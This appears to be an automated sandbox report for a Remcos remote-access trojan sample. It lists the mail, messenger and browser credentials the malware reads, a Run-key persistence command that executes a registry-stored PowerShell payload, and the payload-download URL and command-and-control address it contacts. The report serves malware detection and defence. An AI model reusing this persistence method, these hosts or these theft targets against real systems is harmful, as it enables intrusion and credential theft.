            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Tries to steal Mail credentials (via file registry)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: ESMTPPassword18_2_004033F0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword18_2_00402DB3
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword18_2_00402DB3
            Yara detected WebBrowserPassView password recovery tool
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 4780, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DSGECXJump to behavior
            Yara detected Remcos RAT
            Source: Yara matchFile source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0042DE27 RpcBindingCreateW,18_2_0042DE27

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts1
            Windows Management Instrumentation            		1
            Scripting            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		2
            Obfuscated Files or Information            		2
            Credentials in Registry            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		212
            Process Injection            		1
            Software Packing            		1
            Credentials In Files            		3
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login Hook1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		NTDS129
            System Information Discovery            		Distributed Component Object Model2
            Clipboard Data            		1
            Remote Access Software            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets241
            Security Software Discovery            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input Capture113
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion            		DCSync4
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528523 Sample: SecuriteInfo.com.FileRepMal... Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 43 geoplugin.net 2->43 45 cmgtrading.eu 2->45 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Multi AV Scanner detection for dropped file 2->57 59 10 other signatures 2->59 10 SecuriteInfo.com.FileRepMalware.12793.28433.exe 3 27 2->10         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\Skeletonlike.pas, ASCII 10->37 dropped 71 Suspicious powershell command line found 10->71 14 powershell.exe 20 10->14         started        signatures6 process7 file8 39 SecuriteInfo.com.F...are.12793.28433.exe, PE32 14->39 dropped 41 SecuriteInfo.com.F...exe:Zone.Identifier, ASCII 14->41 dropped 73 Writes to foreign memory regions 14->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 14->75 77 Powershell drops PE file 14->77 18 wabmig.exe 5 14 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 47 107.173.4.16, 2404, 49982, 49984 AS-COLOCROSSINGUS United States 18->47 49 geoplugin.net 178.237.33.50, 49983, 80 ATOM86-ASATOM86NL Netherlands 18->49 51 cmgtrading.eu 185.26.107.57, 443, 49980, 49981 ATE-ASFR France 18->51 61 Detected Remcos RAT 18->61 63 Maps a DLL or memory area into another process 18->63 24 wabmig.exe 1 18->24         started        27 wabmig.exe 1 18->27         started        29 wabmig.exe 14 18->29         started        31 cmd.exe 1 18->31         started        signatures12 process13 signatures14 65 Tries to steal Instant Messenger accounts or passwords 24->65 67 Tries to harvest and steal browser information (history, passwords, etc) 24->67 69 Tries to steal Mail credentials (via file / registry access) 27->69 33 conhost.exe 31->33         started        35 reg.exe 1 1 31->35         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.FileRepMalware.12793.28433.exe47%ReversingLabsWin32.Backdoor.Remcos

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe47%ReversingLabsWin32.Backdoor.Remcos

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://www.imvu.comr0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://www.imvu.com0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            http://geoplugin.net/json.gp0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://login.yahoo.com/config/login0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.ebuddy.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cmgtrading.eu
            		185.26.107.57
            		truefalse
              		unknown
              geoplugin.net
              		178.237.33.50
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://cmgtrading.eu/CubBVEODo227.binfalse
                  		unknown
                  https://cmgtrading.eu/CubBVEODo227.binfalse
                    		unknown
                    http://geoplugin.net/json.gpfalse
                    • URL Reputation: safe
                    		unknown
                    107.173.4.16true
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.imvu.comrwabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://geoplugin.net/json.gplwabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://geoplugin.net/json.gpkwabmig.exe, 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://cmgtrading.eu/CubBVEODo227.bin~wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://cmgtrading.eu/=wabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.imvu.comwabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2432235624.00000000033CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cmgtrading.eu/CubBVEODo227.bincwabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://cmgtrading.eu/kwabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.imvu.comawabmig.exe, 00000013.00000002.2432235624.00000000033CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.nirsoft.netwabmig.exe, 00000011.00000002.2457021842.0000000002AE4000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.FileRepMalware.12793.28433.exe, SecuriteInfo.com.FileRepMalware.12793.28433.exe.7.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            		unknown
                                            https://www.google.comwabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		unknown
                                              https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.2400944448.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://cmgtrading.eu/CubBVEODo227.binzRZswabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://contoso.com/powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://geoplugin.net/json.gpRwabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.google.com/accounts/serviceloginwabmig.exefalse
                                                    		unknown
                                                    https://login.yahoo.com/config/loginwabmig.exe, wabmig.exe, 00000011.00000002.2457479475.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.nirsoft.net/wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2400944448.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.ebuddy.comwabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      185.26.107.57
                                                      		cmgtrading.euFrance
                                                      		24935ATE-ASFRfalse
                                                      107.173.4.16
                                                      		unknownUnited States
                                                      		36352AS-COLOCROSSINGUStrue
                                                      178.237.33.50
                                                      		geoplugin.netNetherlands
                                                      		8455ATOM86-ASATOM86NLfalse

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1528523
                                                      Start date and time:2024-10-08 00:37:39 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 45s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:21
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                      Detection:MAL
                                                      Classification:mal100.phis.troj.spyw.evad.winEXE@17/14@2/3
                                                      EGA Information:
                                                      • Successful, ratio: 83.3%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 221
                                                      • Number of non-executed functions: 234
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 7536 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: SecuriteInfo.com.FileRepMalware.12793.28433.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      00:40:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Markedsandel %Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)
                                                      00:40:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Markedsandel %Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)
                                                      18:38:34API Interceptor39x Sleep call for process: powershell.exe modified
                                                      18:41:00API Interceptor1658343x Sleep call for process: wabmig.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      185.26.107.57SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • cmgtrading.eu/eODGqfP132.bin
                                                      RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • cmgtrading.eu/FqVHUWUBY92.bin
                                                      xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • cmgtrading.eu/FqVHUWUBY92.bin
                                                      GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                      • cmgtrading.eu/FqVHUWUBY92.bin
                                                      Doc_3485638568454.docx.docGet hashmaliciousAveMaria, UACMeBrowse
                                                      • zqpispa.it/
                                                      107.173.4.16file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        5UQ2Xybm0q.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                          SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                    GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                      Mcib4Llptj.exeGet hashmaliciousRemcosBrowse
                                                                        SecuriteInfo.com.W64.GenKryptik.MAGC.tr.15181.21426.exeGet hashmaliciousRemcosBrowse
                                                                          178.237.33.50beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • geoplugin.net/json.gp
                                                                          invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          HkeU5FHEO1.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          cmgtrading.euSDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          geoplugin.netbeNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
                                                                          invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          HkeU5FHEO1.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ATOM86-ASATOM86NLbeNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
                                                                          invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          HkeU5FHEO1.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          AS-COLOCROSSINGUSbeNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 192.210.214.9
                                                                          C72elF4p2o.exeGet hashmaliciousRedLine, XRedBrowse
                                                                          • 198.12.90.244
                                                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                                          • 192.227.146.254
                                                                          invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                          • 192.3.101.184
                                                                          ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                          • 107.175.130.20
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 107.172.130.147
                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                          • 192.210.150.29
                                                                          na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                          • 107.172.130.147
                                                                          na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                          • 172.245.123.6
                                                                          na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                          • 107.172.148.201
                                                                          ATE-ASFRSDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          https://forrefab.ae/Get hashmaliciousUnknownBrowse
                                                                          • 185.26.107.54
                                                                          nCOg3q4a8C.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.26.107.246
                                                                          SlHgSOYcMY.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.26.106.244
                                                                          fQsT6cuFUj.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.26.107.246
                                                                          BiL6ODSRNK.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.26.107.246
                                                                          http://larrys474-my.sharepoint.comGet hashmaliciousUnknownBrowse
                                                                          • 185.26.107.51

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          37f463bf4616ecd445d4a1937da06e19Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                          • 185.26.107.57
                                                                          WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                                                          • 185.26.107.57
                                                                          out.exeGet hashmaliciousVidarBrowse
                                                                          • 185.26.107.57
                                                                          PEDIDO-144848.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          SecuriteInfo.com.Win64.TrojanX-gen.22573.8055.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.26.107.57
                                                                          down.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.26.107.57
                                                                          jre-6-windows-i586.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.26.107.57
                                                                          transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 185.26.107.57
                                                                          SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 185.26.107.57
                                                                          t5985gRtZo.lnkGet hashmaliciousUnknownBrowse
                                                                          • 185.26.107.57

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json

                                                                          Download File
                                                                          Process:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):962
                                                                          Entropy (8bit):5.013811273052389
                                                                          Encrypted:false
                                                                          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
